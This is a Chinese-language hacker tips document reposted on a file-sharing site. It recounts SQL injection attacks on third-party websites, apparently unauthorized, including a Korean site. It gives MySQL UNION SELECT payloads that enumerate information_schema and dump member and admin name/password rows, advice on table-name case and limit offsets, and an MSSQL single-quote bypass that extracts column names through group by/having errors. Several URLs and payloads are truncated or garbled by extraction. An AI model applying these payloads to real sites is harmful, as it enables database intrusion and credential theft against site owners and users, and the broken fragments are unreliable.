出书黑客一些技巧分享.doc

《出书黑客一些技巧分享.doc》由会员分享，可在线阅读，更多相关《出书黑客一些技巧分享.doc（4页珍藏版）》请在淘文阁 - 分享文档赚钱的网站上搜索。

1、出书黑客一些技巧分享 NO1 PHP 注入竟然分大小写 某次鱼总丢一站点来，说能表名和列名，就是取不出值！ 摘自红色黑客联盟() 原文：http:/ KR 站，所以看不懂 内容，最后通过抓取 pangolin 的包，得到字段数为 16，pangolin 的语句为： BMode=Show&table=gongji&uid_no=318+and+1=2+union+select+0,0,0,concat(char(94),char(9 4),char(94),cast(count(*)+as+char),char(94),char(94),char(94),0,0,0,0,0,0,0,0,0,0,

2、0,0+from+infor mation_schema.tables+where+table_schema=0x656e3475+limit+1-+and+1=1 这下好办，试着将第四个字段换成version，OK，显示正常，没弹框（这个过程中，我 把 javascript 禁用了，方便点） ，于是换成： http:/www.xx/community/01.php?B . +1=2+union+select+0,0,0,m_id,0,0,0,0,0,0,0,0,0,0,0,0+from+mem_info+limit+1,1-汗，果然什么都没有，怪不得 pangolin 也取不到值呢！都到这地

3、步了，简单分析可知，这 里应该并没有什么过滤系统，最后怀疑是不是在大小写上有手脚，于是将表名大小写换成 目标一样后（这里只是表名切换成大小写，列名不受大小写影响） ，成功得到内容： http:/www.xx/community/01.php?B . +1=2+union+select+0,0,0,m_id,0,0,0,0,0,0,0,0,0,0,0,0+from+Mem_Info+limit+1,1-以前记得 php+mysql 组合是不分大小写的，今天竟然碰到这样的问题，很是奇怪！另外提 一下 mysql 里的 limit 语句，如果管理员只有一个用户的话，语句应该为 select name

4、,password from admin limit 0,1，而非之前的 select name,password from admin limit 1,1，limit x,y，表示从 x 行开始取 y 条纪录。这个站就是这样的，当时可把鱼总搞郁闷了， 因为老暴不出值来，呵呵后来从波哥那里得知，这种情况可能是一些 IDS 的影响NO2 MSSQL 注入单引号绕过也是以前帮鱼总搞站的时候，记得在暴列名的时候，无法用 select column_name from information_schema.columns where table_name=xxx来取，因为这里的单引号过滤掉了， 上次的解决办法是先猜出 admin 表下有个 name 列，然后利用 select * from admin group by name 这样的方法得到列，今天发现其实就算不知道里面任何一列，也是可以做到的，语句 如下： http:/ n%20having%201=1%29这样得到当前一个列名为 IdfAdmin，得到下一个列名： http:/ n%20group%20by%20IDfAdmin%29这样，单引号限制完全就绕过了！摘自红色黑客联盟() 原文：http:/